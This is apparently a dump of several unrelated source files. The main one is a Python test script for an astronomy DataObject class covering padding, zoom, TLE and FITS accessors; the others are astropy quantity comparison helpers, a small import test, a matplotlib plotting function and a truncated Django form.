print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPadLeft")
print("Test getPadLeft with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
padLeftExp = 25
data.setPadLeft(padLeftExp)
padLeftOut = data.getPadLeft()
if(padLeftExp == padLeftOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(padLeftExp, padLeftOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPadLeft with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getPadLeft()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setPadRight")
print("Test setPadRight with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'CheckPixels',validsnr)
data.setPadRight(20)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setPadRight with non-integer input")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setPadRight("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("Test setPadRight with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setPadRight(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Doesn't throw error")
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getPadRight")
print("Test getPadRight with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
padRightExp = 25
data.setPadRight(padRightExp)
padRightOut = data.getPadRight()
if(padRightExp == padRightOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(padRightExp, padRightOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getPadRight with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getPadRight()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setHeight")
print("Test setHeight with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setHeight(15)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setHeight with invalid input type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setHeight("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setHeight with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setHeight(15)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getHeight")
print("Test getHeight with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
heightExp = 15
data.setHeight(heightExp)
heightOut = data.getHeight()
if(heightExp == heightOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(heightExp, heightOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getHeight with invaid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getHeight()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setWidth")
print("Test setWidth with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setWidth(15)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setWidth with invalid input type")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setWidth("Not an int")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setWidth with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.setWidth(15)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getWidth")
print("Test getWidth with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'CheckPixels', validsnr)
widthExp = 15
data.setWidth(widthExp)
widthOut = data.getWidth()
if(widthExp == widthOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(widthExp, widthOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getWidth with invaid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
data.getWidth()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test Simulate functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSimulateImage")
print("Test setSimulateImage with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
correctField = data.getImageData16()
data.setSimulateImage(correctField)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSimulate image with invalid input type")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
data.setSimulateImage("Not a numpy.ndarray")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSimulateImage with wrong number of dimensions")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate', validsnr)
onlyonedim = np.array([1,2,3]).astype(np.int16)
data.setSimulateImage(onlyonedim)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSimulateImage with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
correctField0 = np.array([1,2,3]).astype(np.int16)
correctField1 = np.array([4,5,6]).astype(np.int16)
correctField = (correctField0, correctField1)
data.setSimulateImage(correctField)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test getSimulateImage")
print("Test getSimulateImage with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Simulate',validsnr)
simulateExp = data.getImageData16()
data.setSimulateImage(simulateExp)
simulateOut = data.getSimulateImage()
comparison = (simulateExp == simulateOut)
if(comparison.all()):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(figureExp, figureOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
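#Note: the valid-conditions test above builds the boolean array
#(simulateExp == simulateOut) and reduces it with .all(). A minimal
#equivalent sketch using numpy's helper (illustrative arrays; np is already
#imported by this script):
#exampleA = np.array([1, 2, 3]).astype(np.int16)
#exampleB = np.array([1, 2, 3]).astype(np.int16)
#np.array_equal(exampleA, exampleB) #True only when shapes and all elements match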
print("Test getSimulateImage with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
data.getSimulateImage()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test Zoom Functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setZoomFactor")
print("Test setZoomFactor with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
data.setZoomFactor(float(1.0))
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setZoomFactor with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
data.setZoomFactor("Not a float")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setZoomFactor with invalid value")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
data.setZoomFactor(float(-0.1))
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidZoomFactorException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setZoomFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
data.setZoomFactor(float(1.0))
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getZoomFactor")
print("Test getZoomFactor with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed',validsnr)
zoomFactorExp = float(2.5)
data.setZoomFactor(zoomFactorExp)
zoomFactorOut = data.getZoomFactor()
if(zoomFactorExp == zoomFactorOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(zoomFactorExp, zoomFactorOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getZoomFactor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
zoomFactor = data.getZoomFactor()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setZoomedImages")
print("Test setZoomedImages with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed', validsnr)
zoomedObj = ZoomObject(image=plt.figure())
zoomedImgs = [zoomedObj]
data.setZoomedImages(zoomedImgs)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setZoomedImages with non-list input")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed', validsnr)
data.setZoomedImages("Not a list")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error")
print(e)
failures = failures + 1
print("Test setZoomedImages with non-ZoomObject element in list")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed', validsnr)
nonZoomList = []
nonZoomList.append(3)
data.setZoomedImages(nonZoomList)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setZoomedImages with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
zoomedObj = ZoomObject(image=plt.figure())
zoomedImgs = [zoomedObj]
data.setZoomedImages(zoomedImgs)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getZoomedImages")
print("Test getZoomedImages with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Zoomed', validsnr)
zoomedObj = ZoomObject(image=plt.figure())
zoomedImgsExp = [zoomedObj]
data.setZoomedImages(zoomedImgsExp)
zoomedImgsOut = data.getZoomedImages()
if(zoomedImgsExp == zoomedImgsOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(zoomedImgsExp, zoomedImgsOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getZoomedImages with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
zoomedImgsOut = data.getZoomedImages()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
#Test Orbit functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setTle")
print("Test setTle with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle(validtle)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setTle with non-formatted tle")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle(blahtext)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setTle with empty filename")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle("")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setTle with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.setTle(validtle)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getTleData")
print("Test getTleData with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle(validtle)
tleDataOut = data.getTleData()
with open(validtle) as tle:
tleDataExp=tle.readlines()
if(tleDataExp == tleDataOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(tleDataExp, tleDataOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getTleData with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.getTleData()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getTleLength")
print("Test getTleData with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setTle(validtle)
tleLengthOut = data.getTleLength()
with open(validtle) as tle:
tleData = tle.readlines()
tleLengthExp=len(tleData)
if(tleLengthExp == tleLengthOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(tleLengthExp, tleLengthOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getTleData with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.getTleLength()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setFits")
print("Test setFits with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setFits(validfits)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setFits with non-formatted fits")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setFits(emptytext)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setFits with empty filename")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setFits("")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setFits with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.setFits(validfits)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getWcsInfo")
print("Test getWcsInfo with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits', validsnr)
data.setFits(validfits)
wcsInfoOut = data.getWcsInfo()
wcsInfoExp = None
with fits.open(validfits):
wcsInfoExp = wcs.WCS(validfits)
wcsInfoExpStr = wcsInfoExp.to_header_string()
wcsInfoOutStr = wcsInfoOut.to_header_string()
if(wcsInfoExpStr == wcsInfoOutStr):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(wcsInfoExp, wcsInfoOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getWcsInfo with wrong flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
data.getWcsInfo()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test setOrbitPlot")
print("Test setOrbitPlot with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
figure = plt.figure()
data.setOrbitPlot(figure)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setOrbitPlot with invalid type")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
data.setOrbitPlot("Not a figure")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setOrbitPlot with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot',validsnr)
figure = plt.figure()
data.setOrbitPlot(figure)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getOrbitPlot")
print("Test getOrbitPlot with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Orbits',validsnr)
figureExp = plt.figure()
data.setOrbitPlot(figureExp)
figureOut = data.getOrbitPlot()
if(figureExp == figureOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(figureExp, figureOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getOrbitPlot with incorrect flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot',validsnr)
data.getOrbitPlot()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are finished testing
print("-----------------------")
print("Tests: {}".format(tests))
print("Successes: {}".format(successes))
print("Failures: {}".format(failures))
[dataset metadata omitted: quality-signal columns for the preceding test script (87,192 bytes, 2,636 lines), then the record header for the next file: utilipy/tests/helper/quantity_array.py from nstarman/utilipy, BSD-3-Clause, 6,703 bytes, 2 stars]
# -*- coding: utf-8 -*-
"""PDB and close-to-zero safe element-wise |Quantity| array comparisons.
The Astropy function :func:`~astropy.tests.helper.quantity_allclose` has
a few shortcomings:
- It fails if the arguments `a` and `b` are, or are close to, zero
- PDB diagnostics when the units don't match are really hard
"""
__all__ = [
"eltwise_quantity_isclose",
"eltwise_quantity_allclose",
"eltwise_assert_quantity_isclose",
"eltwise_assert_quantity_allclose",
]
##############################################################################
# IMPORTS
# BUILT-IN
import typing as T
from itertools import zip_longest
# THIRD PARTY
import astropy.units as u
import numpy as np
from astropy.units.quantity import (
_unquantify_allclose_arguments as _unquantify,
)
##############################################################################
# PARAMETERS
QuantityType = T.TypeVar("QuantityType", bound=u.Quantity)
##############################################################################
# CODE
##############################################################################
# TODO support argument kwargs
def eltwise_quantity_isclose(
a,
b,
rtol=1e-15,
atol=None,
equal_nan=False,
wrap: T.Union[None, T.Tuple[int, QuantityType]] = None,
):
"""Returns True if two arrays are element-wise equal within a tolerance.
This is a |Quantity|-aware version of :func:`~numpy.allclose`,
modified from :mod:`~astropy` to be easier for PDB debugging.
.. warning::
This function should only be used when setting up testing.
Use :func:`~astropy.units.allclose` or
:func:`~astropy.tests.helper.quantity_allclose`.
Parameters
----------
wrap : T.Tuple[int, QuantityType], optional
Per-element periods; each pair of elements is phase-wrapped (reduced
modulo its period via ``divmod``) before being compared.
"""
# Splitting the comparison into a for-loop allows for element-wise
# comparisons and prevents dropping into sub-functions so we stay in this
# namespace when in PDB.
try:
alen = len(a)
except TypeError: # scalar
a = [a]
alen = 1
try:
blen = len(b)
except TypeError: # scalar
b = [b]
blen = 1
assert alen == blen
try:
len(rtol)
except TypeError: # scalar
rtol = np.broadcast_to(rtol, blen, subok=True)
try:
len(atol)
except TypeError: # scalar
atol = np.broadcast_to(atol, blen, subok=True)
wrap = wrap if wrap is not None else [wrap]
close = []
for x, y, rt, at, wrp in zip_longest(a, b, rtol, atol, wrap):
if wrp is not None: # adjust to phase-wrap
x = np.divmod(x, wrp)[1] # the "remainder"
y = np.divmod(y, wrp)[1]
try:
x, y, _rt, _at = _unquantify(x, y, rt, at)
except u.UnitsError as e:
raise u.UnitsError(e)
compare = u.isclose(x, y, rtol=_rt, atol=_at, equal_nan=equal_nan)
close.append(compare)
return np.array(close)
# /def
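# A minimal usage sketch (illustrative values): unlike a scalar allclose,
# the element-wise form hands back the full boolean array, which is what
# makes per-element inspection in PDB convenient.
#
#     >>> eltwise_quantity_isclose([1, 2] * u.km, [1000, 2001] * u.m, atol=2 * u.m)
#     array([ True,  True])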
# -------------------------------------------------------------------
# TODO support argument kwargs
def eltwise_quantity_allclose(
a,
b,
rtol=1e-15,
atol=None,
equal_nan=False,
wrap: T.Union[None, T.Tuple[int, QuantityType]] = None,
):
"""Returns True if two arrays are element-wise equal within a tolerance.
This is a |Quantity|-aware version of :func:`~numpy.allclose`,
modified from :mod:`~astropy` to be easier for PDB debugging.
.. warning::
This function should only be used when setting up testing.
Use :func:`~astropy.units.allclose` or
:func:`~astropy.tests.helper.quantity_allclose`.
"""
return np.all(
eltwise_quantity_isclose(
a, b, rtol=rtol, atol=atol, equal_nan=equal_nan, wrap=wrap
)
)
# /def
# -------------------------------------------------------------------
# TODO support argument kwargs
def eltwise_assert_quantity_isclose(
a,
b,
rtol=1e-15,
atol=None,
equal_nan=False,
wrap: T.Union[None, T.Tuple[int, QuantityType]] = None,
):
"""Returns True if two arrays are element-wise equal within a tolerance.
This is a |Quantity|-aware version of :func:`~numpy.allclose`,
modified from :mod:`~astropy` to be easier for PDB debugging.
.. warning::
This function should only be used when setting up testing.
Use :func:`~astropy.units.allclose` or
:func:`~astropy.tests.helper.quantity_allclose`.
"""
# Splitting the comparison into a for-loop allows for element-wise
# comparisons and prevents dropping into sub-functions so we stay in this
# namespace when in PDB.
try:
alen = len(a)
except TypeError: # scalar
a = [a]
alen = 1
try:
blen = len(b)
except TypeError:
b = [b]
blen = 1
assert alen == blen
try:
len(rtol)
except TypeError: # scalar
rtol = np.broadcast_to(rtol, blen, subok=True)
try:
len(atol)
except TypeError: # scalar
atol = np.broadcast_to(atol, blen, subok=True)
wrap = wrap if wrap is not None else [wrap]
for x, y, rt, at, wrp in zip_longest(a, b, rtol, atol, wrap):
if wrp is not None: # adjust to phase-wrap
x = np.divmod(x, wrp)[1] # the "remainder"
y = np.divmod(y, wrp)[1]
try:
x, y, _rt, _at = _unquantify(x, y, rt, at)
except u.UnitsError as e:
raise u.UnitsError(e)
assert u.isclose(
x, y, rtol=_rt, atol=_at, equal_nan=equal_nan
), f"{x}, {y} | {_rt}, {_at}"
# /def
# -------------------------------------------------------------------
# TODO support argument kwargs
def eltwise_assert_quantity_allclose(
a,
b,
rtol=1e-15,
atol=None,
equal_nan=False,
wrap: T.Union[None, T.Tuple[int, QuantityType]] = None,
):
"""Raise an assertion if two objects are not equal up to desired tolerance.
This is a :class:`~astropy.units.Quantity`-aware version of
:func:`numpy.testing.assert_allclose`,
modified from :mod:`~astropy` to be easier for PDB debugging.
.. warning::
This function should only be used when setting up testing.
Use :func:`~astropy.tests.helper.assert_quantity_allclose`.
"""
# Splitting the comparison into a for-loop allows for element-wise
# comparisons and prevents dropping into sub-functions so we stay in this
# namespace when in PDB.
return eltwise_assert_quantity_isclose(
a, b, rtol=rtol, atol=atol, equal_nan=equal_nan, wrap=wrap
)
# /def
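# A usage sketch for the ``wrap`` argument (illustrative values): each element
# pair is reduced modulo the supplied period before comparison, so angles that
# differ by a full turn assert as equal.
#
#     >>> eltwise_assert_quantity_allclose(
#     ...     [10, 370] * u.deg, [370, 10] * u.deg,
#     ...     wrap=[360 * u.deg, 360 * u.deg],
#     ... )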
##############################################################################
# END
[dataset metadata omitted: quality-signal columns for quantity_array.py, then the record header for the next file: tests/unit/test_public_imports.py from peajayni/pgevents, MIT, 110 bytes]
def test_import_app():
from pgevents import App
def test_import_event():
from pgevents import Event
[dataset metadata omitted: quality-signal columns for test_public_imports.py, then the record header for the next file: src/plot.py from JohannesAnd/TDT4265-Face, MIT, 1,379 bytes]
from matplotlib import pyplot as plt
def plot_training_score(history):
plt.figure()
plt.title("loss")
plt.xlabel("epochs")
plt.ylabel("loss")
plt.plot([num for num in range(1, len(history.history['loss'])+1)],
history.history['loss'])
plt.axis([1, 10, min(history.history['loss']),
max(history.history['loss'])])
plt.figure()
plt.title("Accuracy")
plt.xlabel("epochs")
plt.ylabel("acc")
plt.plot([num for num in range(1, len(history.history['acc'])+1)],
history.history['acc'])
plt.axis([1, 10, min(history.history['acc']), max(history.history['acc'])])
#print('Available variables to plot: {}'.format(history.history.keys()))
plt.show()
# TODO: Visualize the plot, to be applied after training is complete
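# A minimal usage sketch (assumes a Keras-style History object whose
# .history dict holds 'loss' and 'acc' lists, as the code above expects):
#
#     history = model.fit(x_train, y_train, epochs=10)
#     plot_training_score(history)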
[dataset metadata omitted: quality-signal columns for plot.py, then the record header for the next file: half_tones/half_tones/__init__.py from giovaninppc/MC920, MIT, 206 bytes]
from half_tones.floyd_steinberg import *
from half_tones.stevenson_arce import *
from half_tones.burkes import *
from half_tones.sierra import *
from half_tones.stucki import *
from half_tones.jjn import *
[dataset metadata omitted: quality-signal columns for half_tones/__init__.py, then the record header for the next file: myblog/forms.py from gokul-h/blog, MIT, 1,293 bytes]
from django import forms
from .models import Post
class Postform(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'title_tag', 'author', 'body', 'snippet')
widgets = {
